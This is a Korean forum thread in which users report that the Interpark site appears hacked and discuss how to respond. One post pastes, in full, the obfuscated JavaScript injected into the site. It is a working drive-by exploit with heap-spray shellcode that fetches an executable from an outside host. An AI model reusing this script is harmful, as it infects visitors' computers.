지금 인*파크 해킹당한거 분명한데....
이거 아무리 봐도 크래킹 당한것 같습니다.
웹싸이트 접속하면, 어떤 ip로 어딘가 접속하고, ybcc.***.ac.kr로도 접속합니다.
xp-home sp2에다가 기본적인 보안 세팅이어서 그런지 pc가 먹통되는데, 테스트용 2000 pro ie5.0으로는
들어가지네요. 근데, 이게 문제입니다. netstat보면 문제가 되는 서버로 연결이 되어 있고요..
엉뚱한 id로 로그인 하려고 하면, 통상적으로 나타나는 실패 page가 아니고 그냥 "아이디/패스워드가
틀렸습니다"라는 창이 나오네요. gmarket에서는 로그인 실패가 잘되고요..
고객센터에 전화해도 상담 시간 아니라고 나오는데, 처음본게 거의 3시쯤이었으니까,, 어쩌면 많은 사람들
로그인 정보가 유출될 수도 있겠네요. 이런경우 어떻게 해야할지 난감하네요.. 설마 지금 그냥 단순한
오류는 아니겠지요? 웹쪽은 워낙 아는게 없어서.. ^^;
이럴때, 어디선가 본 openID의 필요성이라는게 절실히 느껴지네요.
아, 그리고 링크된 페이지 중에는 이런것들이 있었습니다. 제 pc에도 문제가 생긴건 아닌지 불안하네요 T.T
<script>document.write(unescape('%3C%68%74%6D%6C%3E%0D%0A%3C%6F%62%6A%65%63%74%20%69%64%3D%6E%6F%75%73%65%20%63%6C%61%73%73%69%64%3D%22%43%4C%53%49%44%3A%7B%38%38%64%39%36%39%63%35%2D%66%31%39%32%2D%31%31%64%34%2D%61%36%35%66%2D%30%30%34%30%39%36%33%32%35%31%65%35%7D%22%3E%0D%0A%3C%2F%6F%62%6A%65%63%74%3E%0D%0A%3C%53%43%52%49%50%54%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%6F%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%6E%6F%75%73%65%27%29%2E%6F%62%6A%65%63%74%3B%0D%0A%74%72%79%20%7B%0D%0A%6F%2E%6F%70%65%6E%28%6E%65%77%20%41%72%72%61%79%28%29%2C%6E%65%77%20%41%72%72%61%79%28%29%2C%6E%65%77%20%41%72%72%61%79%28%29%2C%6E%65%77%20%41%72%72%61%79%28%29%2C%6E%65%77%20%41%72%72%61%79%28%29%29%3B%0D%0A%7D%20%63%61%74%63%68%28%65%29%20%7B%7D%3B%0D%0A%6F%2E%6F%70%65%6E%28%6E%65%77%20%4F%62%6A%65%63%74%28%29%2C%6E%65%77%20%4F%62%6A%65%63%74%28%29%2C%6E%65%77%20%4F%62%6A%65%63%74%28%29%2C%6E%65%77%20%4F%62%6A%65%63%74%28%29%2C%20%6E%65%77%20%4F%62%6A%65%63%74%28%29%29%3B%0D%0A%70%3D%75%6E%65%73%63%61%70%65%28%27%5C%75%30%64%35%35%5C%75%30%64%30%64%5C%75%30%64%30%64%5C%75%30%64%30%64%5C%75%30%64%30%64%5C%75%30%64%30%64%5C%75%30%64%30%64%27%29%3B%0D%0A%70%61%79%6C%6F%61%64%20%3D%20%09%75%6E%65%73%63%61%70%65%28%22%25%75%39%30%39%30%25%75%39%30%39%30%25%75%30%66%65%62%25%75%33%33%35%62%25%75%36%36%63%39%25%75%38%30%62%39%25%75%38%30%30%31%25%75%65%66%33%33%25%75%65%32%34%33%25%75%65%62%66%61%25%75%65%38%30%35%25%75%66%66%65%63%25%75%66%66%66%66%25%75%38%62%37%66%25%75%64%66%34%65%25%75%65%66%65%66%25%75%36%34%65%66%25%75%65%33%61%66%25%75%39%66%36%34%25%75%34%32%66%33%25%75%39%66%36%34%25%75%36%65%65%37%25%75%65%66%30%33%25%75%65%66%65%62%25%75%36%34%65%66%25%75%62%39%30%33%25%75%36%31%38%37%25%75%65%31%61%31%25%75%30%37%30%33%25%75%65%66%31%31%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%65%62%25%75%37%37%38%37%25%75%36%35%31%31%25%75%30%37%65%31%25%75%65%66%31%66%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%65%37%25%75%63%61%38%37%25%75%31%30%35%66%25%75%30%37%32%64%25%75%65%66%30%64%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%65%33%25%75%30%30%38%37%25%75%30%66%32%31%25%75%30%37%38%66%25%75%65%66%33%62%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%66%66%25%75%32%65%38%37%25%75%30%61%39%36%25%75%30%37%35%37%25%75%65%66%32%39%25%75%65%66%65%66%25%75%61%61%36%36%25%75%61%66%66%62%25%75%64%37%36%66%25%75%39%61%32%63%25%75%36%36%31%35%25%75%66%37%61%61%25%75%65%38%30%36%25%75%65%66%65%65%25%75%62%31%65%66%25%75%39%61%36%36%25%75%36%34%63%62%25%75%65%62%61%61%25%75%65%65%38%35%25%75%36%34%62%36%25%75%66%37%62%61%25%75%30%37%62%39%25%75%65%66%36%34%25%75%65%66%65%66%25%75%38%37%62%66%25%75%66%35%64%39%25%75%39%66%63%30%25%75%37%38%30%37%25%75%65%66%65%66%25%75%36%36%65%66%25%75%66%33%61%61%25%75%32%61%36%34%25%75%32%66%36%63%25%75%36%36%62%66%25%75%63%66%61%61%25%75%31%30%38%37%25%75%65%66%65%66%25%75%62%66%65%66%25%75%61%61%36%34%25%75%38%35%66%62%25%75%62%36%65%64%25%75%62%61%36%34%25%75%30%37%66%37%25%75%65%66%38%65%25%75%65%66%65%66%25%75%61%61%65%63%25%75%32%38%63%66%25%75%62%33%65%66%25%75%63%31%39%31%25%75%32%38%38%61%25%75%65%62%61%66%25%75%38%61%39%37%25%75%65%66%65%66%25%75%39%61%31%30%25%75%36%34%63%66%25%75%65%33%61%61%25%75%65%65%38%35%25%75%36%34%62%36%25%75%66%37%62%61%25%75%61%66%30%37%25%75%65%66%65%66%25%75%38%35%65%66%25%75%62%37%65%38%25%75%61%61%65%63%25%75%64%63%63%62%25%75%62%63%33%34%25%75%31%30%62%63%25%75%63%66%39%61%25%75%62%63%62%66%25%75%61%61%36%34%25%75%38%35%66%33%25%75%62%36%65%61%25%75%62%61%36%34%25%75%30%37%66%37%25%75%65%66%63%63%25%75%65%66%65%66%25%75%65%66%38%35%25%75%39%61%31%30%25%75%36%34%63%66%25%75%65%37%61%61%25%75%65%64%38%35%25%75%36%34%62%36%25%75%66%37%62%61%25%75%66%66%30%37%25%75%65%66%65%66%25%75%38%35%65%66%25%75%36%34%31%30%25%75%66%66%61%61%25%75%65%65%38%35%25%75%36%34%62%36%25%75%66%37%62%61%25%75%65%66%30%37%25%75%65%66%65%66%25%75%61%65%65%66%25%75%62%64%62%34%25%75%30%65%65%63%25%75%30%65%65%63%25%75%30%65%65%63%25%75%30%65%65%63%25%75%30%33%36%63%25%75%62%35%65%62%25%75%36%34%62%63%25%75%30%64%33%35%25%75%62%64%31%38%25%75%30%66%31%30%25%75%36%34%62%61%25%75%36%34%30%33%25%75%65%37%39%32%25%75%62%32%36%34%25%75%62%39%65%33%25%75%39%63%36%34%25%75%36%34%64%33%25%75%66%31%39%62%25%75%65%63%39%37%25%75%62%39%31%63%25%75%39%39%36%34%25%75%65%63%63%66%25%75%64%63%31%63%25%75%61%36%32%36%25%75%34%32%61%65%25%75%32%63%65%63%25%75%64%63%62%39%25%75%65%30%31%39%25%75%66%66%35%31%25%75%31%64%64%35%25%75%65%37%39%62%25%75%32%31%32%65%25%75%65%63%65%32%25%75%61%66%31%64%25%75%31%65%30%34%25%75%31%31%64%34%25%75%39%61%62%31%25%75%62%35%30%61%25%75%30%34%36%34%25%75%62%35%36%34%25%75%65%63%63%62%25%75%38%39%33%32%25%75%65%33%36%34%25%75%36%34%61%34%25%75%66%33%62%35%25%75%33%32%65%63%25%75%65%62%36%34%25%75%65%63%36%34%25%75%62%31%32%61%25%75%32%64%62%32%25%75%65%66%65%37%25%75%31%62%30%37%25%75%31%30%31%31%25%75%62%61%31%30%25%75%61%33%62%64%25%75%61%30%61%32%25%75%65%66%61%31%22%29%3B%0D%0A%0D%0A%68%6F%6D%65%20%3D%20%75%6E%65%73%63%61%70%65%28%22%25%75%37%34%36%38%25%75%37%30%37%34%25%75%32%66%33%61%25%75%37%39%32%66%25%75%36%33%36%32%25%75%32%65%36%33%25%75%36%65%37%33%25%75%32%65%37%35%25%75%36%33%36%31%25%75%36%62%32%65%25%75%32%66%37%32%25%75%36%64%36%39%25%75%36%37%36%31%25%75%37%33%36%35%25%75%36%64%32%66%25%75%36%64%37%35%25%75%32%65%36%31%25%75%37%38%36%35%25%75%30%30%36%35%25%75%30%30%30%30%22%29%3B%0D%0A%0D%0A%72%75%6E%6E%61%62%6C%65%20%3D%20%70%61%79%6C%6F%61%64%2B%68%6F%6D%65%3B%0D%0A%6D%61%73%74%65%72%20%3D%20%75%6E%65%73%63%61%70%65%28%22%25%75%30%44%30%44%25%75%30%44%30%44%22%29%3B%0D%0A%77%68%69%6C%65%20%28%6D%61%73%74%65%72%2E%6C%65%6E%67%74%68%3C%32%30%2B%72%75%6E%6E%61%62%6C%65%2E%6C%65%6E%67%74%68%29%0D%0A%7B%0D%0A%09%6D%61%73%74%65%72%2B%3D%6D%61%73%74%65%72%3B%0D%0A%7D%0D%0A%69%6E%74%65%20%3D%20%30%78%34%30%30%30%30%20%2D%20%32%30%3B%0D%0A%6D%61%73%74%65%72%31%20%3D%20%6D%61%73%74%65%72%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%20%32%30%2B%72%75%6E%6E%61%62%6C%65%2E%6C%65%6E%67%74%68%29%3B%0D%0A%6D%61%73%74%65%72%32%20%3D%20%6D%61%73%74%65%72%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%20%6D%61%73%74%65%72%2E%6C%65%6E%67%74%68%2D%32%30%2D%72%75%6E%6E%61%62%6C%65%2E%6C%65%6E%67%74%68%29%3B%0D%0A%77%68%69%6C%65%28%6D%61%73%74%65%72%32%2E%6C%65%6E%67%74%68%3C%28%69%6E%74%65%2D%72%75%6E%6E%61%62%6C%65%2E%6C%65%6E%67%74%68%29%29%0D%0A%7B%0D%0A%09%6D%61%73%74%65%72%32%20%2B%3D%20%6D%61%73%74%65%72%32%3B%0D%0A%09%6D%61%73%74%65%72%32%20%2B%3D%20%6D%61%73%74%65%72%31%3B%0D%0A%7D%0D%0A%63%6F%6E%74%65%78%74%20%3D%20%6E%65%77%20%41%72%72%61%79%28%29%3B%0D%0A%69%69%3D%30%3B%0D%0A%77%68%69%6C%65%28%69%69%2A%32%3C%38%30%38%29%0D%0A%7B%0D%0A%09%63%6F%6E%74%65%78%74%5B%69%69%5D%20%3D%20%6D%61%73%74%65%72%32%20%2B%20%72%75%6E%6E%61%62%6C%65%3B%0D%0A%20%20%20%69%69%3D%69%69%2B%31%3B%0D%0A%7D%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%31%33%3B%69%2B%2B%29%0D%0A%6F%2E%73%65%74%52%65%71%75%65%73%74%48%65%61%64%65%72%28%6E%65%77%20%4F%62%6A%65%63%74%28%29%2C%70%29%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E%0D%0A%3C%2F%62%6F%64%79%3E%0D%0A%3C%2F%68%74%6D%6C%3E%0D%0A'))</script>
크래킹 맞는것
크래킹 맞는것 같네요.
해당 소스의 경우 윈도우의 MSXML 취약점을 이용하여 쉘코드를 실행시키는 소스부분으로 추정됩니다.
해당 문제가 패치가 된 윈도우 사용자분이더라도 해당 싸이트가 변조되었을 가능성이 매우 크므로 문제가 해결될때까지 해당 싸이트 접속을 하지 않으시는게 좋겠습니다.
RET ;My life :P
헉. 조금전에 로그인
헉. 조금전에 로그인 했었는데..
어떻게 확인하죠?
-----------------------
과거를 알고 싶거든 오늘의 네 모습을 보아라. 그것이 과거의 너니라.
그리고 내일을 알고 싶으냐?
그러면 오늘의 너를 보아라. 그것이 바로 미래의 너니라.
고작 블로킹 하나, 고작 25점 중에 1점, 고작 부활동
"만약 그 순간이 온다면 그때가 네가 배구에 빠지는 순간이야"
그쪽 사이트에
그쪽 사이트에 연락하셔서 확인하셔야겠죠...?
그리고 정상화 되면 곧장 비밀번호를 바꾸시거나 하셔야 할 겁니다.
--------------------------
snowall의 블로그입니다.
http://snowall.tistory.com
피할 수 있을때 즐겨라! http://melotopia.net/b
지금은 괜찮아
지금은 괜찮아 보이는데 어떤가요?
Gentoo. Bioinformatics, Protein Interaction.
Gentoo. Bioinformatics, Protein Interaction.
지금도 접근하니
지금도 접근하니 http://ybcc.snu.ac.kr/........ 로 접근하네요.
이게 크래킹이라는 건가요?
해당 페이지로 직접 접근하니, 페이지를 찾을수 없다고 나오고..
인터파크 몇달전에
인터파크 몇달전에 탈퇴해서 다행~
기사 한 번 뜨겠군요.
역시 파폭, 컹커러 지원 안하는 사이트들이 이런 문제가 발생할 가능성이 높아용...
====
( - -)a 이제는 학생으로 가장한 백수가 아닌 진짜 백수가 되어야겠다.
어익후 제 단골집
어익후 제 단골집 박인터 선생님게서 당하셨군요. OTL
########### 기운이 솟아나는 티거 호랑이 노래 ###########
폴짝폴짝 폴짝폴짝 비켜나세요. 티거가 나가거든요 폴짝폴짝폴짝~
저기가는 저 푸우 조심하세요~ 바지벗고 다니다가 어흥!!
http://blog.naver.com/ppiddeg
http://blog.naver.com/ppiddegi?Redirect=Log&logNo=20041406734
나왔군요.
-----------------------
과거를 알고 싶거든 오늘의 네 모습을 보아라. 그것이 과거의 너니라.
그리고 내일을 알고 싶으냐?
그러면 오늘의 너를 보아라. 그것이 바로 미래의 너니라.
고작 블로킹 하나, 고작 25점 중에 1점, 고작 부활동
"만약 그 순간이 온다면 그때가 네가 배구에 빠지는 순간이야"
firefox도 먹통을
리눅스에서 firefox도 먹통을 만드는 군요.
음...
위 블로그에서 사용된 visual ip tracer 프로그램 이름이 궁금하군요...
인터파크 측에서는
인터파크 측에서는 아무런 공지가 없나보네요 ? -_-a
사과도 없는 건가 ;;
이런 것이 바로
이런 것이 바로 이미지 훼손을 우려한 조치이죠. 크래킹을 당해도
쉬쉬하는 것이 이익이기 때문이죠. "크래킹 당해서 죄송합니다."
라고 하면 모르던 사람들도 알게되어 이미지가 크게 실추되고
신뢰성이 떨어지기 때문이죠. 그래서 쉽게 사과하는 결정을 내리지
못할 겁니다.
에휴... 한숨만 나오네요.
블로그: http://turtleforward.blogspot.com
블로그: http://turtleforward.blogspot.com